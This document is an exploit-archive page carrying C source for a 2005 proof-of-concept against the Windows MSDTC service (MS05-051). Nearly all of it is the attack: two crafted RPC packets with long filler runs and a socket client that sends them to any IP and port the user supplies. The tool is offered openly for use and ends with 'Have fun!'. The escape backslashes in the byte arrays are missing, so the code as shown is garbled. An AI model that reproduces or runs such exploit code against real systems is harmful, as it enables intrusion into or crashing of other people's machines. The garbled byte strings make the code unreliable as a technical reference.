[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051)
# Published : 2005-11-27
# Author : darkeagle
# Previous Title : MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)
# Next Title : FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit
/*
MSDTC remote PoC exploit
/ by Darkeagle
/
Unl0ck Research Team
/
/ Greetingz: all UKT boys, 0x557 guys, Sowhat, GHC/RST guys
/ Exploit tested on: Windows 2000 Professional Russian Service Pack 4
/ http://exploiterz.org || http://55k7.org
/ Reference: http://security.nnov.ru/Jdocument906.html
/ ."by default on all Windows 2000 systems."
it's false: by default in my system msdtc service turned off.
*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
unsigned char packet1[] =
"x05x00x0bx03x10x00x00x00x48x00"
"x00x00x01x00x00x00xd0x16xd0x16x00x00x00x00x01x00"
"x00x00x00x00x01x00xe0x0cx6bx90x0bxc7x67x10xb3x17"
"x00xddx01x06x62xdax01x00x00x00x04x5dx88x8axebx1c"
"xc9x11x9fxe8x08x00x2bx10x48x60x02x00x00x00";
unsigned char packet2[] =
"x05x00x00x03x10x00x00x00x04x01"
"x00x00x01x00x00x00xecx00x00x00x00x00x07x00"
"x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x25x00x00x00x00x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00";
int banner (char *proga)
{
system("cls");
printf("** MSDTC remote PoC Exploit **n");
printf(" by Darkeagle n");
printf("nUse: %s <ip> <port>n", proga);
printf("Default port: 3372n");
printf("Have fun!n");
}
int main ( int argc, char *argv[] )
{
SOCKET sock;
WSADATA wsa;
struct sockaddr_in addr;
int port;
char *ip_addr;
if ( argc < 3 ) { banner(argv[0]); exit(0); }
banner(argv[0]);
port = atoi(argv[2]);
ip_addr = argv[1];
printf("[] preparing..n");
WSAStartup(MAKEWORD(2,0), &wsa);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(ip_addr);
printf("[] connecting..n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 )
{ printf("[-] connection failed!n"); exit(0); }
printf("[] sending crafted packet...");
if ( send(sock, packet1, sizeof(packet1), 0) == -1 )
{ printf("[-] send failed!n"); exit(0); }
if ( send(sock, packet2, sizeof(packet2), 0) == -1 )
{ printf("[-] send failed!n"); exit(0); }
printf("ok!n");
closesocket(sock);
WSACleanup();
return 0;
}
// www.Syue.com [2005-11-27]